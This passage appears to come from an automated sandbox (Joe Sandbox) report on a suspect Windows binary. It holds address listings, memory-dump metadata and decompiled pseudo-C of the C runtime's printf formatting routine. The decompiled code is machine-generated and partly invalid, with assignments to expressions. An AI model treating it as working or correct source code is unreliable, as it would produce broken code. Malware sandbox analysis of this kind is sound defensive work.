                            					if(( *(_t600 - 0x10) & 0x00000020) == 0) {
                            						 *( *(_t600 - 0x484)) =  *(_t600 - 0x44c);
                            					} else {
                            						 *( *(_t600 - 0x484)) =  *(_t600 - 0x44c);
                            					}
                            					 *(_t600 - 0x28) = 1;
                            					goto L187;
                            				}
                            			}

















                            0x004235fa
                            0x004235fa
                            0x004235fa
                            0x004235fa
                            0x004235fa
                            0x004235fa
                            0x004235fe
                            0x00423603
                            0x00423606
                            0x00423613
                            0x00000000
                            0x00000000
                            0x00423619
                            0x00423619
                            0x0042361b
                            0x00423629
                            0x0042361d
                            0x0042361d
                            0x0042361d
                            0x00423633
                            0x00423639
                            0x00423646
                            0x00423648
                            0x0042364d
                            0x0042364f
                            0x00423654
                            0x00423659
                            0x0042365b
                            0x00423660
                            0x00423666
                            0x00423668
                            0x00423668
                            0x00423666
                            0x00423670
                            0x004236b8
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423bba
                            0x00423bc0
                            0x00423bca
                            0x00423be4
                            0x00423bfe
                            0x00423c05
                            0x00423c09
                            0x00423c09
                            0x00423be6
                            0x00423beb
                            0x00423bef
                            0x00423bef
                            0x00423bcc
                            0x00423bd1
                            0x00423bd5
                            0x00423bd5
                            0x00423bca
                            0x00423c19
                            0x00423c25
                            0x00423c3b
                            0x00423c40
                            0x00423c40
                            0x00423c56
                            0x00423c5b
                            0x00423c64
                            0x00423c6c
                            0x00423c82
                            0x00423c87
                            0x00423c87
                            0x00423c6c
                            0x00423c8e
                            0x00423d48
                            0x00423d5b
                            0x00423d60
                            0x00000000
                            0x00423c94
                            0x00423c94
                            0x00423c98
                            0x00000000
                            0x00000000
                            0x00423c9e
                            0x00423ca1
                            0x00423caa
                            0x00423cb0
                            0x00423cb0
                            0x00423cbf
                            0x00423cc7
                            0x00000000
                            0x00000000
                            0x00423cc9
                            0x00423ccc
                            0x00423cf1
                            0x00423cf6
                            0x00423cf9
                            0x00423d06
                            0x00423d14
                            0x00423d27
                            0x00423d2c
                            0x00423d3b
                            0x00000000
                            0x00423d3b
                            0x00423d08
                            0x00423d08
                            0x00000000
                            0x00423d08
                            0x00423d46
                            0x00423d63
                            0x00423d6a
                            0x00423d72
                            0x00423d88
                            0x00423d8d
                            0x00423d8d
                            0x00423d72
                            0x00423d6a
                            0x00423d90
                            0x00423d94
                            0x00423d9c
                            0x00423da1
                            0x00423da4
                            0x00423da4
                            0x00423dab
                            0x00423dab
                            0x00422f2b
                            0x00422f32
                            0x00422f3f
                            0x00422f44
                            0x00000000
                            0x00422f57
                            0x00422f61
                            0x00422f88
                            0x00422f6f
                            0x00422f80
                            0x00422f80
                            0x00422f61
                            0x00422f92
                            0x00422f98
                            0x00422fa4
                            0x00422fa7
                            0x00422fb5
                            0x00422fb8
                            0x00422fc5
                            0x0042306a
                            0x00423070
                            0x0042307d
                            0x00000000
                            0x00000000
                            0x00423083
                            0x00423089
                            0x00000000
                            0x00423090
                            0x00423090
                            0x004230aa
                            0x004230af
                            0x00000000
                            0x00000000
                            0x004230b7
                            0x004230b7
                            0x004230be
                            0x004230c1
                            0x004230c4
                            0x004230c7
                            0x004230ca
                            0x004230cd
                            0x004230d0
                            0x004230d7
                            0x004230de
                            0x00000000
                            0x00000000
                            0x004230ea
                            0x004230ea
                            0x004230f1
                            0x004230fd
                            0x00423100
                            0x00423106
                            0x0042310d
                            0x00000000
                            0x00000000
                            0x0042310f
                            0x00423115
                            0x00423115
                            0x0042311c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423160
                            0x00423160
                            0x00423167
                            0x0042316a
                            0x00423194
                            0x00423197
                            0x00423197
                            0x004231a1
                            0x004231a1
                            0x004231a5
                            0x0042316c
                            0x0042316c
                            0x00423178
                            0x0042317b
                            0x0042317f
                            0x00423181
                            0x00423184
                            0x00423184
                            0x00423187
                            0x0042318a
                            0x0042318d
                            0x0042318f
                            0x0042318f
                            0x00423192
                            0x004231a8
                            0x00000000
                            0x00000000
                            0x004231ad
                            0x004231ad
                            0x00000000
                            0x00000000
                            0x004231b9
                            0x004231b9
                            0x004231c0
                            0x004231c3
                            0x004231e3
                            0x004231e6
                            0x004231e6
                            0x004231f0
                            0x004231f0
                            0x004231f4
                            0x004231c5
                            0x004231c5
                            0x004231d1
                            0x004231d4
                            0x004231d8
                            0x004231da
                            0x004231da
                            0x004231e1
                            0x00000000
                            0x00000000
                            0x004231fc
                            0x004231fc
                            0x00423203
                            0x0042320f
                            0x00423212
                            0x00423218
                            0x0042321f
                            0x00423332
                            0x00000000
                            0x00423332
                            0x00423225
                            0x0042322b
                            0x0042322b
                            0x00423232
                            0x00000000
                            0x00423269
                            0x00423269
                            0x0042326c
                            0x0042326f
                            0x00423272
                            0x00423299
                            0x00423299
                            0x0042329c
                            0x0042329f
                            0x004232a2
                            0x004232c6
                            0x004232c6
                            0x004232c9
                            0x004232cc
                            0x004232cf
                            0x00423308
                            0x00423319
                            0x00000000
                            0x00423319
                            0x004232d1
                            0x004232d1
                            0x004232d4
                            0x004232d7
                            0x004232da
                            0x00000000
                            0x00000000
                            0x004232dc
                            0x004232dc
                            0x004232df
                            0x004232e2
                            0x004232e5
                            0x00000000
                            0x00000000
                            0x004232e7
                            0x004232e7
                            0x004232ea
                            0x004232ed
                            0x004232f0
                            0x00000000
                            0x00000000
                            0x004232f2
                            0x004232f2
                            0x004232f5
                            0x004232f8
                            0x004232fb
                            0x00000000
                            0x00000000
                            0x004232fd
                            0x004232fd
                            0x00423300
                            0x00423303
                            0x00423306
                            0x0042330a
                            0x00000000
                            0x0042330a
                            0x00000000
                            0x00423306
                            0x004232a4
                            0x004232a4
                            0x004232a7
                            0x004232ab
                            0x004232ae
                            0x00000000
                            0x004232b0
                            0x004232b3
                            0x004232b6
                            0x004232bc
                            0x004232c1
                            0x00000000
                            0x004232c1
                            0x004232ae
                            0x00423274
                            0x00423274
                            0x00423277
                            0x0042327b
                            0x0042327e
                            0x00000000
                            0x00423280
                            0x00423283
                            0x00423286
                            0x0042328c
                            0x00423291
                            0x00000000
                            0x00423291
                            0x00000000
                            0x0042331b
                            0x0042331b
                            0x0042331e
                            0x00423321
                            0x00000000
                            0x00000000
                            0x00423239
                            0x00423239
                            0x0042323c
                            0x0042323f
                            0x00423242
                            0x0042325b
                            0x0042325e
                            0x0042325e
                            0x00423261
                            0x00423244
                            0x00423244
                            0x00423247
                            0x0042324a
                            0x00423250
                            0x00423256
                            0x00423256
                            0x00000000
                            0x00000000
                            0x00423326
                            0x00423326
                            0x00423329
                            0x00423329
                            0x0042332f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423337
                            0x00423337
                            0x0042333e
                            0x00423344
                            0x0042334a
                            0x0042334d
                            0x00423353
                            0x0042335a
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423b67
                            0x00423b6d
                            0x00423b70
                            0x00423b73
                            0x00423b76
                            0x00423b79
                            0x00423b7f
                            0x00423b7f
                            0x00423b7f
                            0x00423b87
                            0x00423b8b
                            0x00000000
                            0x00000000
                            0x00423b8d
                            0x00423b8d
                            0x00423b90
                            0x00423b93
                            0x00423b93
                            0x00423b98
                            0x00423b9b
                            0x00423b9e
                            0x00423ba1
                            0x00423ba4
                            0x00423ba7
                            0x00423baa
                            0x00423baa
                            0x00423bad
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00423360
                            0x00423366
                            0x00423366
                            0x0042336d
                            0x00000000
                            0x004236f1
                            0x004236f1
                            0x004236ff
                            0x004236ff
                            0x00423702
                            0x00000000
                            0x00000000
                            0x00423374
                            0x00423377
                            0x00423377
                            0x0042337d
                            0x0042337f
                            0x00423382
                            0x00423382
                            0x00423385
                            0x00423385
                            0x00000000
                            0x00000000
                            0x004234ba
                            0x004234bd
                            0x004234bd
                            0x004234c2
                            0x004234c4
                            0x004234c7
                            0x004234c7
                            0x004234ca
                            0x004234ca
                            0x00000000
                            0x00000000
                            0x004238bd
                            0x004238bd
                            0x00000000
                            0x00000000
                            0x00423424
                            0x00423424
                            0x00423430
                            0x00423436
                            0x0042343d
                            0x0042344b
                            0x0042344b
                            0x00423451
                            0x00423454
                            0x00423460
                            0x004234b5
                            0x00000000
                            0x004234b5
                            0x0042343f
                            0x0042343f
                            0x00423445
                            0x00423449
                            0x00423468
                            0x00423468
                            0x0042346e
                            0x00423496
                            0x0042349d
                            0x004234a3
                            0x004234a6
                            0x004234a9
                            0x004234af
                            0x004234b2
                            0x00423470
                            0x00423470
                            0x00423476
                            0x00423479
                            0x0042347c
                            0x00423482
                            0x00423485
                            0x00423488
                            0x0042348a
                            0x0042348d
                            0x0042348d
                            0x00000000
                            0x0042346e
                            0x00000000
                            0x00000000
                            0x00423709
                            0x0042370c
                            0x0042370f
                            0x00423712
                            0x00423718
                            0x0042371b
                            0x00423722
                            0x00423726
                            0x00423731
                            0x00423731
                            0x00423735
                            0x0042374c
                            0x0042374c
                            0x00423753
                            0x00423755
                            0x00423755
                            0x0042375c
                            0x0042375c
                            0x00423763
                            0x00423771
                            0x00423774
                            0x00423783
                            0x00423786
                            0x0042378a
                            0x0042379f
                            0x0042378c
                            0x0042378c
                            0x0042378f
                            0x00423795
                            0x0042379a
                            0x0042379a
                            0x0042378a
                            0x004237a9
                            0x004237ac
                            0x004237af
                            0x004237b2
                            0x004237b5
                            0x004237b8
                            0x004237be
                            0x004237c4
                            0x004237cc
                            0x004237cd
                            0x004237d0
                            0x004237d1
                            0x004237d4
                            0x004237d5
                            0x004237dc
                            0x004237dd
                            0x004237e0
                            0x004237e1
                            0x004237e4
                            0x004237e5
                            0x004237eb
                            0x004237ec
                            0x004237fb
                            0x004237fd
                            0x00423803
                            0x00423803
                            0x00423808
                            0x0042380a
                            0x0042380e
                            0x00423810
                            0x00423818
                            0x00423819
                            0x0042381c
                            0x0042381d
                            0x0042382c
                            0x0042382e
                            0x0042382e
                            0x0042380e
                            0x00423831
                            0x00423838
                            0x0042383b
                            0x00423840
                            0x00423840
                            0x00423846
                            0x00423848
                            0x00423850
                            0x00423851
                            0x00423854
                            0x00423855
                            0x00423863
                            0x00423865
                            0x00423865
                            0x00423846
                            0x00423868
                            0x0042386b
                            0x0042386e
                            0x00423871
                            0x00423876
                            0x0042387b
                            0x0042387e
                            0x00423881
                            0x00423881
                            0x00423884
                            0x00423884
                            0x00423887
                            0x00423893
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00423bb0
                            0x00423737
                            0x00423737
                            0x0042373e
                            0x00423741
                            0x00000000
                            0x00000000
                            0x00423743
                            0x00423743
                            0x00000000
                            0x00423743
                            0x00423728
                            0x00423728
                            0x00000000
                            0x00000000
                            0x00423388
                            0x00423388
                            0x00423393
                            0x0042339b
                            0x004233a2
                            0x004233a5
                            0x004233a5
                            0x004233a8
                            0x00423408
                            0x004233aa
                            0x004233b1
                            0x004233b7
                            0x004233bd
                            0x004233c4
                            0x004233c7
                            0x004233cd
                            0x004233d5
                            0x004233d7
                            0x004233de
                            0x004233e5
                            0x004233ec
                            0x004233f4
                            0x004233f6
                            0x004233f8
                            0x004233f8
                            0x004233ff
                            0x0042340f
                            0x00423415
                            0x00423418
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x0042389b
                            0x0042389e
                            0x004238a1
                            0x004238a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423904
                            0x00423904
                            0x0042390e
                            0x0042390e
                            0x00423914
                            0x00423916
                            0x00423919
                            0x00423919
                            0x0042391f
                            0x0042391f
                            0x00000000
                            0x00000000
                            0x004238b6
                            0x004238b6
                            0x00000000
                            0x00000000
                            0x004234cd
                            0x004234cd
                            0x004234d1
                            0x004234df
                            0x004234e2
                            0x004234d3
                            0x004234d3
                            0x004234d3
                            0x004234e8
                            0x004234ee
                            0x004234f4
                            0x00423500
                            0x00423506
                            0x00423506
                            0x00423509
                            0x00423591
                            0x00423591
                            0x00423595
                            0x00423597
                            0x0042359d
                            0x0042359d
                            0x004235a0
                            0x004235a7
                            0x004235aa
                            0x004235b0
                            0x004235b0
                            0x004235b0
                            0x004235b6
                            0x004235bc
                            0x004235bf
                            0x004235c5
                            0x004235c7
                            0x00000000
                            0x00000000
                            0x004235c9
                            0x004235c9
                            0x004235cf
                            0x004235d2
                            0x004235d4
                            0x00000000
                            0x00000000
                            0x004235d6
                            0x004235dc
                            0x004235df
                            0x004235df
                            0x004235e7
                            0x004235e7
                            0x004235ed
                            0x004235ed
                            0x004235f2
                            0x00000000
                            0x0042350f
                            0x0042350f
                            0x0042350f
                            0x00423513
                            0x00423515
                            0x0042351a
                            0x0042351a
                            0x0042351d
                            0x00423520
                            0x00423526
                            0x00423538
                            0x00423538
                            0x00423538
                            0x0042353b
                            0x00423541
                            0x00000000
                            0x00000000
                            0x00423543
                            0x00423543
                            0x00423549
                            0x0042354c
                            0x0042354e
                            0x00000000
                            0x00000000
                            0x00423550
                            0x00423550
                            0x00423559
                            0x0042355f
                            0x00423563
                            0x0042356b
                            0x0042356d
                            0x0042356f
                            0x00423575
                            0x00423575
                            0x00423578
                            0x00423578
                            0x00423584
                            0x00423587
                            0x0042352f
                            0x00423532
                            0x00423532
                            0x00423535
                            0x00423535
                            0x0042358f
                            0x004235f5
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00000000
                            0x004238ad
                            0x004238ad
                            0x00000000
                            0x00000000
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00423a40
                            0x00423a40
                            0x00423a46
                            0x00423a4c
                            0x00423a52
                            0x00000000
                            0x00423a00
                            0x00423a00
                            0x00423a00
                            0x00423a07
                            0x00000000
                            0x00000000
                            0x00423a09
                            0x00423a09
                            0x00423a14
                            0x00423a1a
                            0x00423a1c
                            0x00423a22
                            0x00423a25
                            0x00423a27
                            0x00423a2d
                            0x00423a36
                            0x00423a3b
                            0x00423a58
                            0x00423a5b
                            0x00423a5b
                            0x00423a60
                            0x00423a65
                            0x00423a65
                            0x00423a6b
                            0x00423a6d
                            0x00423a73
                            0x00423a79
                            0x00423a79
                            0x00423a82
                            0x00423a82
                            0x00423a6b
                            0x00423a88
                            0x00423a8c
                            0x00423a9a
                            0x00423a9d
                            0x00423aa0
                            0x00423aa7
                            0x00423aa9
                            0x00423aa9
                            0x00423a8e
                            0x00423a8e
                            0x00423a8e
                            0x00423ab6
                            0x00423ab6
                            0x00423abc
                            0x00423abe
                            0x00423abe
                            0x00423ac5
                            0x00423acb
                            0x00423ace
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00423ade
                            0x00423ae4
                            0x00423ae4
                            0x00423aea
                            0x00000000
                            0x00000000
                            0x00423aec
                            0x00423aec
                            0x00423aef
                            0x00423af2
                            0x00423af9
                            0x00423b00
                            0x00423b08
                            0x00423b0e
                            0x00423b11
                            0x00423b14
                            0x00423b1b
                            0x00423b27
                            0x00423b2d
                            0x00423b33
                            0x00423b3a
                            0x00423b3c
                            0x00423b42
                            0x00423b42
                            0x00423b48
                            0x00423b48
                            0x00423b4e
                            0x00423b57
                            0x00423b5c
                            0x00423b5f
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423adc
                            0x00423ace
                            0x00423a0b
                            0x00423a0b
                            0x00423a12
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423a12
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423139
                            0x00423139
                            0x0042313c
                            0x0042313f
                            0x00000000
                            0x00000000
                            0x00423144
                            0x00423147
                            0x0042314d
                            0x00000000
                            0x00000000
                            0x0042312e
                            0x00423131
                            0x00423134
                            0x00000000
                            0x00000000
                            0x00423123
                            0x00423126
                            0x00423129
                            0x00000000
                            0x00000000
                            0x00423152
                            0x00423152
                            0x00423155
                            0x00423155
                            0x00423158
                            0x00000000
                            0x00000000
                            0x0042315b
                            0x00000000
                            0x00000000
                            0x00422fcb
                            0x00422fcb
                            0x00422fcd
                            0x00422fdb
                            0x00422fcf
                            0x00422fcf
                            0x00422fcf
                            0x00422feb
                            0x00422ff8
                            0x00422ffa
                            0x00422fff
                            0x00423001
                            0x00423006
                            0x0042300b
                            0x0042300d
                            0x00423012
                            0x00423018
                            0x0042301a
                            0x0042301a
                            0x00423018
                            0x0042301b
                            0x00423022
                            0x00000000
                            0x00423024
                            0x00423029
                            0x00423045
                            0x0042304d
                            0x0042305a
                            0x0042305f
                            0x00000000
                            0x0042305f
                            0x00423022
                            0x00422fc5
                            0x00423db0
                            0x00423db7
                            0x00423dce
                            0x00423dce
                            0x00423dd8
                            0x00423dd8
                            0x00423dde
                            0x00423deb
                            0x00423ded
                            0x00423df2
                            0x00423df4
                            0x00423df9
                            0x00423dfe
                            0x00423e00
                            0x00423e05
                            0x00423e0b
                            0x00423e0d
                            0x00423e0d
                            0x00423e0b
                            0x00423e15
                            0x00423e60
                            0x00423e69
                            0x00423e6e
                            0x00423e17
                            0x00423e1c
                            0x00423e38
                            0x00423e40
                            0x00423e4d
                            0x00423e52
                            0x00423e52
                            0x00000000
                            0x00423e15
                            0x00423db9
                            0x00423dc0
                            0x00000000
                            0x00000000
                            0x00423dc2
                            0x00423dc2
                            0x00000000
                            0x00423dc2
                            0x00423672
                            0x00423672
                            0x00423677
                            0x00423693
                            0x0042369b
                            0x004236a5
                            0x004236a8
                            0x004236ad
                            0x00423e74
                            0x00423e81
                            0x00423e81
                            0x004236bd
                            0x004236c3
                            0x004236e3
                            0x004236c5
                            0x004236d2
                            0x004236d2
                            0x004236e5
                            0x00000000
                            0x004236e5

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
                            • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                            • API String ID: 2386203720-1989478660
                            • Opcode ID: d1832be73c325b2a4bc326d0b119be9072d492e9a98803d1346ca64ab664fcf7
                            • Instruction ID: ef4f74fa8ae9f7b721304c8b29b2ffdaa4a1cf3bc8a7cf0712eaf4efd2d3e382
                            • Opcode Fuzzy Hash: d1832be73c325b2a4bc326d0b119be9072d492e9a98803d1346ca64ab664fcf7
                            • Instruction Fuzzy Hash: 05A19FB0E002289BDB24DF45DC81BAEB374AB44305F5441DAE6097B282D77CAE84CF5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 66%
                            			E00421BA5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t495;
                            				signed int _t497;
                            				signed int _t503;
                            				void* _t508;
                            				signed int _t510;
                            				void* _t530;
                            				signed int _t548;
                            				void* _t558;
                            				signed int _t566;
                            				signed int _t593;
                            				void* _t621;
                            				void* _t622;
                            				signed int _t623;
                            				void* _t625;
                            				void* _t626;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t622 = __esi;
                            					_t621 = __edi;
                            					_t558 = __ebx;
                            					_t495 = E0041C290(_t623 + 0x14);
                            					_t626 = _t625 + 4;
                            					 *((intOrPtr*)(_t623 - 0x288)) = _t495;
                            					if( *((intOrPtr*)(_t623 - 0x288)) == 0) {
                            						goto L82;
                            					}
                            					L81:
                            					__ecx =  *(__ebp - 0x288);
                            					if( *(__ecx + 4) != 0) {
                            						L83:
                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            						if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            							 *(__ebp - 0xc) = 0;
                            							__edx =  *(__ebp - 0x288);
                            							__eax =  *(__edx + 4);
                            							 *(__ebp - 4) =  *(__edx + 4);
                            							__ecx =  *(__ebp - 0x288);
                            							__edx =  *__ecx;
                            							 *(__ebp - 0x24) =  *__ecx;
                            						} else {
                            							__edx =  *(__ebp - 0x288);
                            							__eax =  *(__edx + 4);
                            							 *(__ebp - 4) =  *(__edx + 4);
                            							__ecx =  *(__ebp - 0x288);
                            							__eax =  *__ecx;
                            							asm("cdq");
                            							 *__ecx - __edx =  *__ecx - __edx >> 1;
                            							 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            							 *(__ebp - 0xc) = 1;
                            						}
                            						L86:
                            						while(1) {
                            							L190:
                            							if( *(_t623 - 0x28) != 0) {
                            								goto L216;
                            							}
                            							L191:
                            							if(( *(_t623 - 0x10) & 0x00000040) != 0) {
                            								if(( *(_t623 - 0x10) & 0x00000100) == 0) {
                            									if(( *(_t623 - 0x10) & 0x00000001) == 0) {
                            										if(( *(_t623 - 0x10) & 0x00000002) != 0) {
                            											 *((char*)(_t623 - 0x14)) = 0x20;
                            											 *(_t623 - 0x1c) = 1;
                            										}
                            									} else {
                            										 *((char*)(_t623 - 0x14)) = 0x2b;
                            										 *(_t623 - 0x1c) = 1;
                            									}
                            								} else {
                            									 *((char*)(_t623 - 0x14)) = 0x2d;
                            									 *(_t623 - 0x1c) = 1;
                            								}
                            							}
                            							 *((intOrPtr*)(_t623 - 0x2c4)) =  *((intOrPtr*)(_t623 - 0x18)) -  *(_t623 - 0x24) -  *(_t623 - 0x1c);
                            							if(( *(_t623 - 0x10) & 0x0000000c) == 0) {
                            								E00422790(0x20,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            								_t626 = _t626 + 0x10;
                            							}
                            							E004227D0( *(_t623 - 0x1c), _t623 - 0x14,  *(_t623 - 0x1c),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            							_t626 = _t626 + 0x10;
                            							if(( *(_t623 - 0x10) & 0x00000008) != 0) {
                            								if(( *(_t623 - 0x10) & 0x00000004) == 0) {
                            									E00422790(0x30,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            									_t626 = _t626 + 0x10;
                            								}
                            							}
                            							if( *(_t623 - 0xc) == 0) {
                            								L212:
                            								E004227D0( *(_t623 - 4),  *(_t623 - 4),  *(_t623 - 0x24),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            								_t626 = _t626 + 0x10;
                            								goto L213;
                            							} else {
                            								L204:
                            								if( *(_t623 - 0x24) <= 0) {
                            									goto L212;
                            								}
                            								L205:
                            								 *(_t623 - 0x2dc) = 0;
                            								 *(_t623 - 0x2c8) =  *(_t623 - 4);
                            								 *(_t623 - 0x2cc) =  *(_t623 - 0x24);
                            								while(1) {
                            									L206:
                            									 *(_t623 - 0x2cc) =  *(_t623 - 0x2cc) - 1;
                            									if( *(_t623 - 0x2cc) == 0) {
                            										break;
                            									}
                            									L207:
                            									 *(_t623 - 0x32e) =  *( *(_t623 - 0x2c8));
                            									_t548 = E004212A0(_t623 - 0x2d0, _t623 - 0x2d8, 6,  *(_t623 - 0x32e) & 0x0000ffff);
                            									_t626 = _t626 + 0x10;
                            									 *(_t623 - 0x2dc) = _t548;
                            									 *(_t623 - 0x2c8) =  *(_t623 - 0x2c8) + 2;
                            									if( *(_t623 - 0x2dc) != 0) {
                            										L209:
                            										 *(_t623 - 0x24c) = 0xffffffff;
                            										break;
                            									}
                            									L208:
                            									if( *(_t623 - 0x2d0) != 0) {
                            										L210:
                            										E004227D0( *((intOrPtr*)(_t623 + 8)), _t623 - 0x2d8,  *(_t623 - 0x2d0),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            										_t626 = _t626 + 0x10;
                            										continue;
                            									}
                            									goto L209;
                            								}
                            								L211:
                            								L213:
                            								if( *(_t623 - 0x24c) >= 0) {
                            									if(( *(_t623 - 0x10) & 0x00000004) != 0) {
                            										E00422790(0x20,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            										_t626 = _t626 + 0x10;
                            									}
                            								}
                            							}
                            							L216:
                            							if( *(_t623 - 0x20) != 0) {
                            								L0040C240( *(_t623 - 0x20), 2);
                            								_t626 = _t626 + 8;
                            								 *(_t623 - 0x20) = 0;
                            							}
                            							while(1) {
                            								L218:
                            								 *(_t623 - 0x251) =  *( *(_t623 + 0xc));
                            								_t594 =  *(_t623 - 0x251);
                            								 *(_t623 + 0xc) =  *(_t623 + 0xc) + 1;
                            								if( *(_t623 - 0x251) == 0 ||  *(_t623 - 0x24c) < 0) {
                            									break;
                            								} else {
                            									if( *(_t623 - 0x251) < 0x20 ||  *(_t623 - 0x251) > 0x78) {
                            										 *(_t623 - 0x310) = 0;
                            									} else {
                            										 *(_t623 - 0x310) =  *( *(_t623 - 0x251) + L"pecifier\", 0)") & 0xf;
                            									}
                            								}
                            								L7:
                            								 *(_t623 - 0x250) =  *(_t623 - 0x310);
                            								_t510 =  *(_t623 - 0x250) * 9;
                            								_t566 =  *(_t623 - 0x25c);
                            								_t594 = ( *(_t510 + _t566 + 0x4083d0) & 0x000000ff) >> 4;
                            								 *(_t623 - 0x25c) = ( *(_t510 + _t566 + 0x4083d0) & 0x000000ff) >> 4;
                            								if( *(_t623 - 0x25c) != 8) {
                            									L16:
                            									 *(_t623 - 0x318) =  *(_t623 - 0x25c);
                            									if( *(_t623 - 0x318) > 7) {
                            										continue;
                            									}
                            									L17:
                            									switch( *((intOrPtr*)( *(_t623 - 0x318) * 4 +  &M004225E0))) {
                            										case 0:
                            											L18:
                            											 *(_t623 - 0xc) = 0;
                            											_t513 = E00419390( *(_t623 - 0x251) & 0x000000ff, E0040D3B0(_t623 - 0x40));
                            											_t629 = _t626 + 8;
                            											__eflags = _t513;
                            											if(_t513 == 0) {
                            												L24:
                            												E004226F0( *(_t623 - 0x251) & 0x000000ff,  *(_t623 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            												_t626 = _t629 + 0xc;
                            												goto L218;
                            											} else {
                            												E004226F0( *((intOrPtr*)(_t623 + 8)),  *(_t623 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
                            												_t629 = _t629 + 0xc;
                            												_t571 =  *( *(_t623 + 0xc));
                            												 *(_t623 - 0x251) =  *( *(_t623 + 0xc));
                            												_t594 =  *(_t623 + 0xc) + 1;
                            												__eflags = _t594;
                            												 *(_t623 + 0xc) = _t594;
                            												asm("sbb eax, eax");
                            												 *(_t623 - 0x27c) =  ~( ~( *(_t623 - 0x251)));
                            												if(_t594 == 0) {
                            													_push(L"(ch != _T(\'\\0\'))");
                            													_push(0);
                            													_push(0x486);
                            													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            													_push(2);
                            													_t525 = L0040E1A0();
                            													_t629 = _t629 + 0x14;
                            													__eflags = _t525 - 1;
                            													if(_t525 == 1) {
                            														asm("int3");
                            													}
                            												}
                            												L22:
